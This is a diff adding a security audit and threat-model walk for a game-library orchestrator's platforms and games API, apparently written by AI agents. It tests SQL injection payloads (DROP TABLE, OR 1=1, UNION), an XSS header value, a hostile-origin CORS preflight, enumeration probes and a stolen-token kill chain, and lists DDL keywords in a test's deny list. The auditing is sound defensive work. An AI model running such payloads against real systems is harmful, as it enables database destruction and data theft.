+`parse_sort` validates every user-provided field against `allow_list.fields`. `build_order_by_clause` trusts the SortField dataclass.
+
+### D.2 Direct payload in `sort` value
+
+Verified: `?sort=title:asc; DROP TABLE games; --` → `parse_sort` splits `entry="title:asc; DROP TABLE games; --"`, sees `":"`, splits to `field_name="title"` + `direction="asc; drop table games; --"` (lowered). The direction check `direction not in ("asc","desc")` raises. **Blocked.**
+
+### D.3 Hand-rolled bad SortField bypassing parse_sort
+
+Verified: `build_order_by_clause([SortField(field="id; DROP TABLE games", direction="asc")])` returns `"ORDER BY id; DROP TABLE games ASC"`. **Direct injection.** The SortField dataclass has no runtime validator on its `field` attribute.
+
+The current invocation chain in `routers/games.py` only constructs SortFields via `parse_sort`. But the boundary "parse_sort validates; build_order_by_clause trusts" is NOT documented in either function's docstring. A future endpoint author who constructs SortFields directly — e.g. for a fixed multi-sort policy — could omit the validation step without warning. See SEV-3 finding F-3.
+
+### D.4 The `direction` Literal escape
+
+`narrowed_direction: Literal["asc","desc"] = direction` (L279) uses a `# type: ignore[assignment]`. Runtime is still a plain `str`. The validation at L276 prevents bad runtime values — confirmed safe.
+
+---
+
+## E: Pool method interaction
+
+### E.1 Binding semantics
+
+`Pool.read_one` (pool.py L909-922) calls `conn.execute(sql, params)`. `Pool.read_all` (L924-937) likewise. Both pass `params` directly — `Sequence[Any] | Mapping[str, Any]` typed — to `aiosqlite.execute()`, which forwards to `sqlite3.Cursor.execute(sql, params)`. SQLite parameterizes positional `?` and named `:name` binds via the C API; never string interpolation. **Confirmed safe.**
+
+### E.2 `params=None`?
+
+`read_one`'s default is `params: Sequence[Any] | Mapping[str, Any] = ()` (L910). The games router passes `where_params` (a `list[Any]`) — never `None`. If a future caller passed `None`, aiosqlite would emit `TypeError: argument must be a sequence or dict, not NoneType` (or similar), which would be caught by the `except aiosqlite.Error` block — actually no, `TypeError` would propagate as-is, not be wrapped. The router's `except PoolError` would NOT catch it. This would leak a 500 ISE to the client. Minor robustness concern, not security. Not filed as a finding.
+
+### E.3 `conn.row_factory = aiosqlite.Row` (L699)
+
+Read results come back as named-tuple-like rows. The games router accesses them via `row["metadata"]`, `row["last_error"]`, etc. — no further SQL involvement. Safe.
+
+### E.4 Other pool entry points
+`acquire_reader()` (L1053) returns a raw aiosqlite connection. A caller could in theory build a non-parametric query against it, bypassing the helpers entirely. Out of scope for this audit (BL7 doesn't use it for games), but worth flagging for the OAS/code-review audit: any future caller that uses `acquire_reader()` directly is outside the parametric envelope. The pool log-redaction (`_template_only`) does scrub literals before logging.
+
+**Verdict:** Pool layer correctly parameterizes. No injection vector.
+
+---
+
+## F: Property-test coverage gaps + proposed new tests
+
+### F.1 Gaps in `TestSqlInjectionResistance`
+
+Looking at the existing property test (test_query_helpers.py L370-392):
+
+1. Only fuzzes the VALUE for `platform` (sampled from a tiny set) and `size_bytes` (integers only). The injection payload `"'; DROP TABLE games; --"` is sampled — but only as a `str` value going to a `str` field. The test does not cover:
+2. The OPERATOR keys (always `eq` + `gte`).
+3. The FIELD NAMES (always `platform` + `size_bytes`) — i.e. there's no fuzzing across allow-list fields.
+4. The `in` operator (multi-value parsing). The most complex parser path is never property-tested.
+5. Pagination + filter combinations — `LIMIT ? OFFSET ?` placeholders + the where-clause's `?` count must align with `len(params)`. If they drift, every query breaks; no property pins this.
+6. Sort interaction with filter — `ORDER BY` field-name surface is untested except in unit tests with known-good inputs.
+7. Round-trip: assertions are negative-only ("DROP TABLE not in sql"). Nothing checks that the placeholder count equals the params count, which is the strictest property of a parametric builder.
+
+### F.2 Proposed additions
+
+```python
+# 1) Round-trip invariant: placeholder count == params count.
+#    This is the load-bearing property — if it ever fails, either the SQL is
+#    malformed or a value didn't get bound and was interpolated.
+@given(
+    field=st.sampled_from(["platform", "status", "size_bytes", "owned"]),
+    op_and_val=st.one_of(
+        st.tuples(st.just("eq"), st.text(min_size=0, max_size=64)),
+        st.tuples(st.just("in"), st.lists(st.text(min_size=0, max_size=32),
+                                          min_size=0, max_size=10)),
+        st.tuples(st.just("gte"), st.integers(min_value=-(2**62), max_value=2**62)),
+        st.tuples(st.just("lte"), st.integers(min_value=-(2**62), max_value=2**62)),
+    ),
+)
+def test_placeholder_count_matches_params_count(self, field, op_and_val):
+    from orchestrator.api._query_helpers import build_where_clause
+    op, value = op_and_val
+    # Filter to spec-compatible (field, op) combinations the allow-list permits.
+    allow = _games_allow_list()
+    if op not in allow.by_field[field].ops:
+        return  # skip — allow-list would reject upstream
+    # Skip type-incompatible combos (str value for int field, etc.) — those
+    # raise at parse time, not build time.
+    spec = allow.by_field[field]
+    if op == "in":
+        if spec.value_type is int and not all(
+            isinstance(v, str) and v.lstrip("-").isdigit() for v in value
+        ):
+            return
+        filters = {field: {"in": list(value)}}
+    else:
+        if spec.value_type is int and not (
+            isinstance(value, int) or (isinstance(value, str) and value.lstrip("-").isdigit())
+        ):
+            return
+        filters = {field: {op: value}}
+
+    sql, params = build_where_clause(filters, allow_list=allow)
+    # Invariant: every `?` in the SQL pairs with exactly one bind value.
+    assert sql.count("?") == len(params), (sql, params)
+
+# 2) Cross-field fuzz: combinations of fields & operators never leak values
+#    into SQL text.  Drives the parser end-to-end via QueryParams.
+@given(
+    qs=st.lists(
+        st.tuples(
+            st.sampled_from([
+                "platform", "platform_in", "status", "status_in",
+                "size_bytes", "size_bytes_gte", "size_bytes_lte", "owned",
+            ]),
+            st.text(min_size=0, max_size=32,
+                    alphabet=st.characters(blacklist_categories=("Cs",))),
+        ),
+        min_size=0, max_size=8,
+    ),
+)
+def test_full_pipeline_never_interpolates_user_text(self, qs):
+    from urllib.parse import urlencode
+    from orchestrator.api._query_helpers import (
+        QueryParamError, parse_filters, build_where_clause,
+    )
+    raw = urlencode(qs, doseq=False)
+    try:
+        filters = parse_filters(QueryParams(raw), allow_list=_games_allow_list())
+        sql, params = build_where_clause(filters, allow_list=_games_allow_list())
+    except QueryParamError:
+        return  # Rejected by allow-list / type coercion — expected for fuzz misses.
+    # Property: no user-supplied raw value substring appears in SQL text,
+    # except for the known allow-list identifiers.
+    safe_identifiers = {
+        "platform","status","size_bytes","owned",
+        "last_prefilled_at","last_validated_at",
+        "WHERE","AND","IN","?",">=","<=","!=","=","<",">",
+    }
+    for _, value in qs:
+        if not value:
+            continue
+        # The value MUST NOT appear in the SQL fragment — only in params.
+        # (Allow whitespace/single chars matching identifiers; require >= 4
+        # chars to make the check sensitive without false positives.)
+        if len(value) >= 4 and value not in safe_identifiers:
+            assert value not in sql, (value, sql, params)
+
+# 3) Sort-clause field-name property: every emitted ORDER BY identifier is
+#    a member of the allow-list. Catches a hypothetical regression where
+#    parse_sort might be widened without updating the allow-list check.
+@given(
+    sort_param=st.text(min_size=0, max_size=120,
+                       alphabet=st.characters(blacklist_categories=("Cs",))),
+)
+def test_parse_sort_only_emits_allow_listed_fields(self, sort_param):
+    from orchestrator.api._query_helpers import (
+        QueryParamError, SortField, build_order_by_clause, parse_sort,
+    )
+    allow = _games_sort_allow_list()
+    try:
+        result = parse_sort(
+            QueryParams(f"sort={sort_param}"),
+            allow_list=allow,
+            default=[SortField(field="title", direction="asc")],
+            tie_breaker=SortField(field="id", direction="asc"),
+        )
+    except QueryParamError:
+        return
+    # Every field in the result is allow-listed (the tie-breaker's field is
+    # also allow-listed by spec construction).
+    for s in result:
+        assert s.field in allow.fields or s.field == "id"
+        assert s.direction in ("asc", "desc")
+    # And the assembled ORDER BY contains no semicolons / DDL keywords.
+    order_sql = build_order_by_clause(result)
+    assert ";" not in order_sql
+    upper = order_sql.upper()
+    for keyword in ("DROP", "DELETE", "UPDATE", "INSERT", "UNION", "--", "/*"):
+        assert keyword not in upper
+```
+
+These three additions raise property coverage from "values for two fields" to "round-trip invariant + cross-field fuzz + sort identifier integrity". The first is the most load-bearing single property: if it ever fails, a parametric-binding bug exists somewhere in the helpers.
+
+---
+
+## G: Concrete attack payload library
+
+All "actual" entries verified by running the live module.
+
+| # | Attack payload (URL query) | Expected behaviour | Actual behaviour |
+|---|---|---|---|
+| 1 | `?platform='; DROP TABLE games; --` | Literal bound; 0 rows. | `WHERE platform = ?` with params=`["'; DROP TABLE games; --"]`. Returns 0 rows. **Safe.** |
+| 2 | `?platform=steam' OR '1'='1` | Literal bound; 0 rows. | `WHERE platform = ?` with params=`["steam' OR '1'='1"]`. 0 rows. **Safe.** |
+| 3 | `?status_in=a,b,c) UNION SELECT * FROM platforms; --` | 4 csv tokens bound; 0 rows. | `WHERE status IN (?, ?, ?)` with params=`["a", "b", "c) UNION SELECT * FROM platforms; --"]`. 0 rows. **Safe.** |
+| 4 | `?sort=title:asc; DROP TABLE games; --` | 400 (bad direction). | `QueryParamError("invalid sort direction: 'asc; drop table games; --'")` → router returns 400. **Safe.** |
+| 5 | `?sort=password` | 400 (unknown sort field). | `QueryParamError("'password' is not a sortable field")` → 400. **Safe.** |
+| 6 | `?size_bytes_gte=0 OR 1=1` | 400 (not an int). | `QueryParamError("invalid value for size_bytes_gte: '0 OR 1=1'")` → 400. **Safe (blocked at parse).** |
+| 7 | `?size_bytes_in=1,2,3` | 400 (op `in` not permitted on size_bytes). | `QueryParamError("operator 'in' not allowed for field 'size_bytes'")` → 400. **Safe.** |
+| 8 | `?evil_field=anything` | 400 (unknown field). | `QueryParamError("unknown filter field: evil")` (split eats `_field` as `_eq`? no — none of the known operator suffixes match `_field`, so full key `evil_field` is treated as the field name, also unknown) → 400. **Safe.** |
+| 9 | `?status_in=` (empty) | Ideally 400 or no-filter. | `WHERE status IN (?)` with params=`[""]`. Query valid; matches 0 rows. **Not a vuln; surprising UX.** See SEV-4 finding F-4. |
+| 10 | `?status_in=,` | Probably 400. | `WHERE status IN (?, ?)` with params=`["", ""]`. Matches 0 rows. **Not a vuln; same UX issue as #9.** |
+| 11 | `?platform=steam&platform=epic` (duplicate keys) | Either "first wins", "last wins", or "merged into IN". | Starlette `QueryParams.__iter__` yields each unique key ONCE; `params["platform"]` returns the LAST value. Result: `WHERE platform = ?` params=`["epic"]`. The "steam" value is silently discarded. **Not a vuln; possibly surprising.** See SEV-4 finding F-5. |
+| 12 | `?platform_in=a,a,a,...` (×100,000) | Bounded or 400. | 100k placeholders + 100k params; SQLite executes it. Verified up to 32766 placeholders work. **DoS surface.** See SEV-3 finding F-2. |
+| 13 | `?sort=title:asc,title:desc` (contradictory) | Both emitted, last wins at SQL level. | `ORDER BY title ASC, title DESC, id ASC`. SQLite uses the first key for primary sort; the contradiction is silently absorbed. **Not a vuln; not a useful exploit.** |
+| 14 | Future bug: hand-build `FilterAllowList({"id; DROP TABLE games; --": ...})` | Should never happen — but does it crash? | Emits `WHERE id; DROP TABLE games; -- = ?`. **Defence-in-depth gap** (the runtime cannot tell whether an identifier is "safe"). See SEV-3 finding F-1. |
+| 15 | Future bug: hand-built `SortField(field="id; DROP TABLE games", direction="asc")` | Should never happen — but does it crash? | Emits `ORDER BY id; DROP TABLE games ASC`. **Same class of defence-in-depth gap.** See SEV-3 finding F-3. |
+
+---
+
+## Findings
+
+### SEV-1
+None.
+
+### SEV-2
+None. The shipped games endpoint correctly parameterizes all user values, and the field-name allow-list keys are hardcoded literals.
+
+### SEV-3
+
+#### F-1 — Defence-in-depth recheck in `build_where_clause` is structurally cosmetic
+The "defensive re-check" at `_query_helpers.py:214-215` validates `field_name in allow_list.by_field` — but `allow_list` is the SAME object the keys originated from. A FilterAllowList constructed with malicious keys passes the recheck trivially. Recommendation: enforce an identifier regex (`^[a-z][a-z0-9_]*$`) on every key when `FilterAllowList.__init__` is called, OR (preferred) on every emitted identifier inside `build_where_clause`. This makes the recheck a real second line of defence regardless of the caller's correctness.
+
+#### F-2 — Unbounded `_in` token count enables CPU/memory DoS
+`parse_filters` accepts arbitrarily long comma-separated `_in` payloads. SQLite's bind limit is 32766 placeholders; until then the parser splits, coerces, and the SQL builder concatenates. A single 1 MB query string with `?platform_in=a,a,...,a` does meaningful CPU + memory work before short-circuiting on the allow-list value mismatch (which never short-circuits, since 'a' is a string and `value_type=str` accepts it). Recommendation: cap `_in` list size — e.g., 200 elements — and raise `QueryParamError` past that. Document the cap in the endpoint spec.
+
+#### F-3 — `build_order_by_clause` trusts SortField; no validator on the dataclass
+`SortField.field` is a plain `str`. `build_order_by_clause` emits `f"{s.field} {s.direction.upper()}"` without any validation. The boundary "parse_sort validates; build_order_by trusts pre-validated SortFields" is not documented in either function's docstring. A future endpoint author who constructs SortField objects directly (e.g., for fixed default sorts in a different endpoint) could omit the allow-list check without any compile-time warning. Recommendation:
+  - Add a `__post_init__` validator on SortField that enforces `field` matches `^[a-z][a-z0-9_]*$` and `direction in ("asc","desc")`. Cheap, dataclass-friendly, and makes the dataclass safe-by-construction.
+  - OR: add the docstring boundary callout in BOTH `parse_sort` and `build_order_by_clause`.
+
+### SEV-4
+
+#### F-4 — Empty `_in` list silently builds `IN (?)` with `""`
+`?status_in=` produces a query that matches 0 rows but consumes a DB roundtrip. Recommendation: in `parse_filters`, after `raw_value.split(",")`, filter out empty-after-strip tokens; if the resulting list is empty, raise `QueryParamError("status_in: at least one value required")`. UX win + tiny perf win.
+
+#### F-5 — Duplicate filter keys silently discard all but the last value
+`?platform=steam&platform=epic` parses to `platform=epic` (Starlette's `QueryParams.__iter__` yields each key once; `params[key]` returns the last value). The user's intent — "either steam or epic" — is plausibly `_in`, but they would never know their first value was dropped. Recommendation: in `parse_filters`, detect duplicate keys via `getlist(key)` length > 1 and raise `QueryParamError("duplicate query parameter: <key>; use '<field>_in=' for multi-value filters")`. Improves error messaging; prevents silent data loss.
+
+### Non-findings (verified safe / out of scope)
+
+- **PRAGMA f-strings in `pool.py:_open_connection`**: Pragma names/values come from a hardcoded list inside the pool itself; no user input touches this surface.
+- **Pool error wrapping (`_wrap_aiosqlite_error`)**: scrubs literal values from logs via `_template_only` (`_LITERAL_RE`). Verified to handle string/identifier/hex/NULL/numeric literals.
+- **`narrowed_direction: Literal["asc","desc"] = direction` with `# type: ignore`**: runtime check at L276 guarantees the runtime str is one of those two; the type assertion is purely for the type-checker.
+- **`metadata` JSON parsing in games router**: pure post-query handling; doesn't influence SQL surface.
+- **`last_error` truncation at 200 chars**: same — output processing, not SQL surface.
+- **`acquire_reader()` raw escape hatch**: out of scope for BL7 (games router doesn't use it). Worth a separate review for any future caller.
+- **SQLite variable limit ("999 limit" attack)**: doesn't apply here; the build's limit is 32766 and was raised in SQLite 3.32.
+
+---

--- a/tests/uat/sessions/2026-05-20-session-4/agent-results/threat-model.md
+++ b/tests/uat/sessions/2026-05-20-session-4/agent-results/threat-model.md
@@ -1,0 +1,471 @@
+# UAT-4 Threat Model Walk
+**Agent:** threat-model
+**Date:** 2026-05-20
+**Persona:** Penetration Tester ("I have a bearer token — what do I do next?")
+**Scope:** BL6 (`GET /api/v1/platforms`) + BL7 (`GET /api/v1/games`) surface on top of the UAT-3-hardened BL5 substrate.
+
+---
+
+## TM walks
+
+### TM-001 — Bearer-token leak / unauthenticated access to BL6+BL7
+**Walk.** I have stolen the bearer token (TM-023 step 4). First, I confirm I actually need it: I curl both endpoints without `Authorization`:
+
+```
+GET /api/v1/platforms                 -> expect 401
+GET /api/v1/games?limit=5             -> expect 401
+GET /api/v1/games/                    -> trailing slash variant -> still routed?
+GET /api/v1/games?_=evade             -> noise param doesn't help
+```
+
+Grep the exempt path tuple (`src/orchestrator/api/dependencies.py:28-33`):
+
+```python
+AUTH_EXEMPT_PATHS = (
+    ("/api/v1/health", False),
+    ("/api/v1/openapi.json", False),
+    ("/api/v1/docs", True),
+    ("/api/v1/redoc", False),
+)
+```
+
+Neither `/api/v1/platforms` nor `/api/v1/games` is present. `BearerAuthMiddleware.__call__` (middleware.py:236-242) does `path == exempt_path` or `path.startswith(exempt_path + "/")` — so `/api/v1/platforms` and `/api/v1/games` fall through to bearer enforcement. UAT-3 already nailed the substring-prefix evasion (`/api/v1/healthxxx`). `OPTIONS` is exempt for CORS preflight only — fine, no body is returned.
+
+I cannot reach either endpoint without the token.
+
+**Verdict: MITIGATED.**
+
+---
+
+### TM-005 — SQL injection at the BL6+BL7 endpoint surface
+**Walk.** With the bearer, I try to break out of the query builder. BL6 has no user-controlled SQL whatsoever (`platforms.py:63-67` is a static string with a hard-coded `ORDER BY`). One identifier appears in the query (`'steam'`) but it is a literal in the source — not derived from input. Dead end at BL6.
+
+BL7 is the interesting target. The endpoint composes three primitives from `_query_helpers.py`:
+
+```python
+where_sql, where_params = build_where_clause(filters, allow_list=GAMES_FILTER_ALLOW_LIST)
+order_sql = build_order_by_clause(sort)
+count_sql = f"SELECT COUNT(*) AS total FROM games {where_sql}".strip()
+rows_sql = f"SELECT {_GAMES_COLUMNS} FROM games {where_sql} {order_sql} LIMIT ? OFFSET ?".strip()
+```
+
+Attack 1 — value-side payload:
+
+```
+GET /api/v1/games?platform=steam'; DROP TABLE games; --
+```
+
+`parse_filters` calls `_coerce_value(raw, str, ...)` which just returns the raw string. Then `build_where_clause` appends `{field} = ?` (line 223) and pushes the raw string into `params`. The driver (`aiosqlite`) parameter-binds it. The `'` and `;` never escape the bind value. Confirmed by `TestSqlInjectionResistance` Hypothesis property test.
+
+Attack 2 — identifier-side payload:
+
+```
+GET /api/v1/games?platform);DROP--=steam
+```
+
+`parse_filters` derives field_name = "platform);DROP--", looks it up in `GAMES_FILTER_ALLOW_LIST.by_field`, miss → 400. Identifier interpolation is gated by allow-list membership; the defensive re-check in `build_where_clause:214-215` makes this a layered invariant.
+
+Attack 3 — sort-side payload:
+
+```
+GET /api/v1/games?sort=title;DROP--:asc
+```
+
+`parse_sort` looks up `"title;DROP--"` in `GAMES_SORT_ALLOW_LIST.fields`, miss → 400. Direction is checked against the `{"asc","desc"}` set; "asc--" yields 400.
+
+Attack 4 — `_in` boundary:
+
+```
+GET /api/v1/games?platform_in=steam,'OR1=1
+```
+
+`split(",")` produces ["steam", "'OR1=1"]; each passes through `_coerce_value(str, ...)` unchanged; both become parameter-bound values. The placeholders SQL is `platform IN (?, ?)`. Safe.
+
+The router composes the helpers correctly. No string-format / no f-string of values into SQL. The `# noqa: S608` comments (games.py:182-185, 188) are accurate; the f-string only interpolates allow-list-validated tokens.
+
+**Verdict: MITIGATED.**
+
+---
+
+### TM-011 — CORS misconfiguration / regression after UAT-3 reorder
+**Walk.** Per UAT-3 (ADR-0012 addendum) CORS is now the OUTERMOST middleware. From `main.py:165-175`:
+
+```python
+app.add_middleware(BearerAuthMiddleware)   # innermost (registered first)
+app.add_middleware(BodySizeCapMiddleware)
+app.add_middleware(CorrelationIdMiddleware)
+app.add_middleware(CORSMiddleware, ...)    # outermost (registered last)
+```
+
+Because Starlette prepends, the runtime order is CORS → CorrelationId → BodySizeCap → BearerAuth → routers. BL6+BL7 inherit this via `app.include_router(...)`. There is no per-router CORS override. CORS allow-origins comes from `settings.cors_origins` (not `*`). `allow_credentials=False`. Methods are an explicit list including GET (used by both endpoints).
+
+Concrete preflight attempt from a hostile origin:
+
+```
+OPTIONS /api/v1/games
+Origin: https://attacker.example
+Access-Control-Request-Method: GET
+```
+
+`BearerAuthMiddleware.__call__:212-214` skips OPTIONS, so the preflight reaches the CORS layer cleanly. CORS rejects (origin not in allow-list); browser refuses to send the real GET. A non-browser client can still hit the endpoint, but it then needs the bearer (TM-001). No new vector at BL6+BL7.
+
+A residual concern: CorrelationId is now inside CORS, so CORS-rejected preflights lack a correlation_id in logs. UAT-3 explicitly accepted this trade.
+
+**Verdict: MITIGATED.**
+
+---
+
+### TM-012 — Credential redaction in `api.platforms.read_failed` / `api.games.read_failed`
+**Walk.** I want to coerce sensitive row content into a log line.
+
+BL6 (`platforms.py:69`):
+
+```python
+_log.error("api.platforms.read_failed", reason=str(e))
+```
+
+`e` is a `PoolError`. ADR-0011 declares PoolError messages must not contain SQL/params/credentials. The router never logs `row["last_error"]` or any other column — rows are returned in the JSONResponse body but never reach a log call. ID3 redaction also covers the chain if `e` accidentally has a sensitive key in its kwargs.
+
+BL7 (`games.py:196` and `:211-214`):
+
+```python
+_log.error("api.games.read_failed", reason=str(e))
+...
+_log.warning("api.games.metadata_parse_failed", game_id=row["id"])
+```
+
+The `metadata_parse_failed` log emits only `game_id` (an integer PK). It does NOT include `raw_meta` (the malformed JSON string). Good — a hostile metadata value cannot smuggle itself into the log channel.
+
+`last_error` is truncated to 200 chars and rendered in the response body, but it does NOT appear in any log call from the router. If `last_error` contained a Steam refresh token by mistake (data-layer bug), it would leak via the wire to an authenticated client, NOT via logs — out of TM-012 scope.
+
+**Verdict: MITIGATED** for log-side. Wire-side disclosure of `last_error` is a data-handling concern noted in §Findings below.
+
+---
+
+### TM-013 — Differential responses as a fingerprinting / enumeration oracle
+**Walk.** UAT-3 reduced this surface, but BL7's 400 messages are a new oracle. Three response shapes from BL7: 200, 400, 503. The 400 carries an attacker-controlled diagnostic string. I probe:
+
+```
+GET /api/v1/games?password=foo   -> 400 {"detail": "unknown filter field: password"}
+GET /api/v1/games?platform=foo   -> 200 {... games: [], total: 0 ...}   (with applied_filters echo)
+GET /api/v1/games?title=foo      -> 400 {"detail": "unknown filter field: title"}
+GET /api/v1/games?status=foo     -> 200
+GET /api/v1/games?id=42          -> 400 {"detail": "unknown filter field: id"}
+```
+
+So the message is the same shape — `unknown filter field: <name>` — for any non-allow-listed name. I learn nothing about whether `title` is a column; I only learn that it's not in `GAMES_FILTER_ALLOW_LIST`. That allow-list (`platform, status, owned, size_bytes, last_prefilled_at, last_validated_at`) is also visible in the OpenAPI bundle (loopback-only). The 400 doesn't distinguish "column does not exist" from "column exists but not filterable" — both produce the same message. Good.
+
+Timing differential: 400 paths short-circuit before any SQL; 200 with `?status=foo` runs `COUNT(*)` + `SELECT`. A measurable delta exists (sub-millisecond on a small DB; tens of ms on the 2,600-row production DB), but it only confirms "this field is in the allow-list" — which is the same information you get from the response status code. No additional schema knowledge leaks via timing.
+
+Schema enumeration via 400 messages is covered in detail in Beyond-TM scenario 1.
+
+**Verdict: PARTIAL — see §Findings F1 (400-message field enumeration is a minor information disclosure).**
+
+---
+
+### TM-015 — Resource exhaustion via BL7 query path
+**Walk.** I am authenticated. I want to DoS the DB or response pipeline.
+
+Attack 1 — high limit:
+
+```
+GET /api/v1/games?limit=999999
+```
+
+`parse_pagination` rejects `limit > 500` with 400. Hard cap, enforced before SQL.
+
+Attack 2 — `OFFSET` abuse:
+
+```
+GET /api/v1/games?limit=500&offset=99999999
+```
+
+`offset >= 0` is the only constraint. SQLite walks `offset` rows before returning — but a `WHERE` clause limits the work, and even on a 1M-row table SQLite's offset-walk on an indexed sort is sub-second. With our default sort by `title` (no index on `title`) it requires a full sort first, then offset/limit. For 1M rows, this is the pathology. Wall-clock estimate on DXP4800: 2–4 s. Not a runaway; not a 30-second hang; but a hot-loop of these requests can saturate the aiosqlite pool (10 connections, per TM-015 mitigation note). uvicorn's `limit_concurrency` will queue further requests.
+
+Attack 3 — `COUNT(*)` pathology — the explicit ask:
+
+```
+GET /api/v1/games            # no filter, default limit
+```
+
+This always runs `SELECT COUNT(*) FROM games` (no WHERE) followed by the page query. On a 1M-row games table without partial indexes covering the predicate-free count, SQLite scans the entire `games` table or — if there's no compact covering index — uses the rowid index (fast). With STRICT mode and INTEGER PRIMARY KEY AUTOINCREMENT, `COUNT(*)` is roughly O(n) page-reads in the worst case. At 1M rows, ~50–100 ms on warm cache, maybe 500 ms cold. Not a 5-second hang.
+
+Attack 4 — combined: `?last_validated_at_gte=2000-01-01` (a high-cardinality filter with no index). The filter is allow-listed, but `games.last_validated_at` has no index in the schema. SQLite full-scans + filters in-memory. On 1M rows this is the worst case: a couple of seconds per request. Burst 20 such requests in parallel → pool exhausts → uvicorn queues → no 5xx, just slow.
+
+Realistic verdict: the BL7 endpoint will be slow under malicious load on a saturated DB but will not crash. The 503 path (PoolError) is the failure mode; pool exhaustion returns properly. No memory blowup because `limit ≤ 500` rows × ~2 KB row = ~1 MB max response.
+
+**Verdict: MITIGATED for crash/exhaust; PARTIAL for sustained-slowdown. See §Findings F2.**
+
+---
+
+### TM-018 — Oversized request body on GET endpoints
+**Walk.** Both endpoints are GET. I send:
+
+```
+GET /api/v1/games HTTP/1.1
+Content-Length: 999999999
+
+<gibberish body>
+```
+
+`BodySizeCapMiddleware` reads Content-Length and short-circuits 413 if > 32 KiB. So this is rejected before any handler runs. But — do the handlers actually call `request.body()`? `platforms.py` doesn't import `Request` at all. `games.py` uses `Request` only for `request.query_params`. No `await request.body()`. No `await request.json()`. The body is silently ignored by the routers.
+
+Even if the cap layer were absent, the handlers wouldn't materialize the body. No oversized-body vector on GET.
+
+**Verdict: MITIGATED.**
+
+---
+
+### TM-021 — Correlation ID injection / regression
+**Walk.** UAT-3 made `CorrelationIdMiddleware` regenerate any malformed UUID. I send:
+
+```
+GET /api/v1/games
+X-Correlation-ID: "><script>alert(1)</script>
+```
+
+middleware.py:67-68:
+
+```python
+cid_in = cid_bytes.decode("ascii", errors="ignore")
+cid = cid_in if _UUID4_RE.match(cid_in) else str(uuid.uuid4())
+```
+
+`_UUID4_RE` is strict UUIDv4. The attacker payload fails regex → server generates a fresh UUID. The crafted value never appears in any log key (correlation_id) or response header. Both BL6 and BL7 inherit this via `app.include_router(...)`.
+
+Bonus check: what if I send a perfectly-valid attacker-chosen UUIDv4 (e.g., `aaaaaaaa-aaaa-4aaa-8aaa-aaaaaaaaaaaa`)? That passes the regex and is honored. Threat impact: log-stitching — attacker can correlate their own requests across log lines. Not a confidentiality, integrity, or availability impact. Documented elsewhere (UAT-3 accepted residual risk).
+
+**Verdict: MITIGATED.**
+
+---
+
+### TM-023 — Kill-chain step 6: `/api/v1/games` is NOT loopback-only
+**Walk.** Per `dependencies.py:55-61`, the loopback-only patterns are `platforms/{name}/auth`, `openapi.json`, `docs`, `redoc`. `/api/v1/games` and `/api/v1/platforms` are bearer-only, LAN-reachable. This is the documented threat-model behavior — TM-023 step 6 explicitly notes "the orchestrator has no defense against a valid-bearer-token request."
+
+With my stolen bearer from a compromised Game_shelf LXC, I:
+
+1. `GET /api/v1/platforms` — confirm both platforms `auth_status: "ok"`, get sync timestamps.
+2. `GET /api/v1/games?limit=500&offset=0`, then `?offset=500`, … walk the entire library in 6 requests (2,600 games ÷ 500). 
+3. Cross-reference titles + sizes against the operator's public Steam profile to confirm identity.
+4. Apply `?status=blocked` to learn which games the operator has hidden — a soft signal about gaming preferences/embarrassment.
+
+All as designed. The kill chain is acknowledged in the threat model; no new mitigation is in BL6+BL7 scope.
+
+**Verdict: PARTIAL / AS-DESIGNED.** Compensating control = pfSense host-restriction (Phase 3/4 ops) + Game_shelf .env hygiene.
+
+---
+
+## Beyond-TM scenarios
+
+### Scenario 1 — Schema enumeration via 400 messages
+**Walk.** I attack the allow-list disclosure. I write a dictionary attack iterating through 100 candidate field names:
+
+```python
+for name in ["title","id","app_id","platform","status","owned","size_bytes",
+             "current_version","cached_version","last_validated_at",
+             "last_prefilled_at","last_error","metadata","auth_status",
+             "auth_method","auth_expires_at","last_sync_at","config",
+             "name","password","admin","secret","steam_session"]:
+    r = GET /api/v1/games?{name}=x
+    if r.status == 200: known_filterable.add(name)
+    elif r.status == 400 and "unknown filter field" in r.text: known_not_filterable.add(name)
+```
+
+I learn:
+- `platform, status, owned, size_bytes, last_prefilled_at, last_validated_at` → filterable (200 returned).
+- Every other name → 400 `"unknown filter field"`.
+
+What does this reveal that's not already in the threat model? **Very little**, because:
+
+1. The same information appears in `/api/v1/openapi.json` (loopback-only post-UAT-3 — attacker on LAN cannot reach it).
+2. The codebase is open-source; the allow-list is grep-able from GitHub in ~10 seconds. Knowing this list does not advance the attacker.
+3. The 400 does NOT distinguish "column exists but is not filterable" from "column does not exist". I cannot, from outside, tell whether `title` is a real column or a phantom — both give the same 400. The schema is NOT enumerated; only the filter allow-list is.
+
+So: minor disclosure (the filter allow-list, which is also public via source code). No schema enumeration.
+
+**Severity: SEV-4 (informational, accepted).** See §Findings F1.
+
+---
+
+### Scenario 2 — `applied_filters` echo as a binary-search value oracle
+**Walk.** The endpoint echoes `applied_filters` with the parsed (and coerced) value. If I send `?size_bytes_gte=50000000000`, the echo confirms server-side coercion succeeded. Combined with `meta.total`, this gives me a binary-search probe:
+
+```
+?size_bytes_gte=10000000000   -> total=89
+?size_bytes_gte=50000000000   -> total=3
+?size_bytes_gte=80000000000   -> total=1
+?size_bytes_gte=100000000000  -> total=0
+```
+
+I've now learned the operator owns 89 games ≥ 10 GB, 3 games ≥ 50 GB, exactly 1 game ≥ 80 GB and ≤ 100 GB. Cross-reference public game-size data (PCGamingWiki, SteamDB): the only 80-100 GB Steam game in the operator's plausible library is, say, Call of Duty: Modern Warfare III. I've leaked one library entry via inference, without any title field being filterable.
+
+But: **I already have the full library list via Scenario walk on TM-023 step 6.** A user with a stolen bearer can simply `GET /api/v1/games?limit=500` and read all titles directly. The oracle attack is strictly less powerful than the direct read.
+
+So: oracle exists only if a sub-token grants size-aggregation queries but not list reads — which is not the current design (single bearer, full access). For the current single-bearer model, this oracle is dominated by the direct read.
+
+**Severity: SEV-4** (would matter post-MVP if a read-aggregate-only token role is introduced). See §Findings F3.
+
+---
+
+### Scenario 3 — `meta.total` as an aggregate-count oracle
+**Walk.** Same model as Scenario 2 but for the 8 status values:
+
+```
+?status=blocked          -> total=12   (operator has hidden 12 games)
+?status=validation_failed -> total=4   (4 games corrupt — useful for disruption: trigger refresh)
+?status=downloading      -> total=1   (real-time activity signal)
+```
+
+The `status=downloading` total at a given timestamp is a side-channel for "is the operator actively prefetching right now?" — useful for an attacker planning a DoS window. Combined with the kill-chain step 7 (prefill amplification), an attacker who notices `downloading=0` knows the operator's WAN link is currently idle and can saturate it without competing traffic.
+
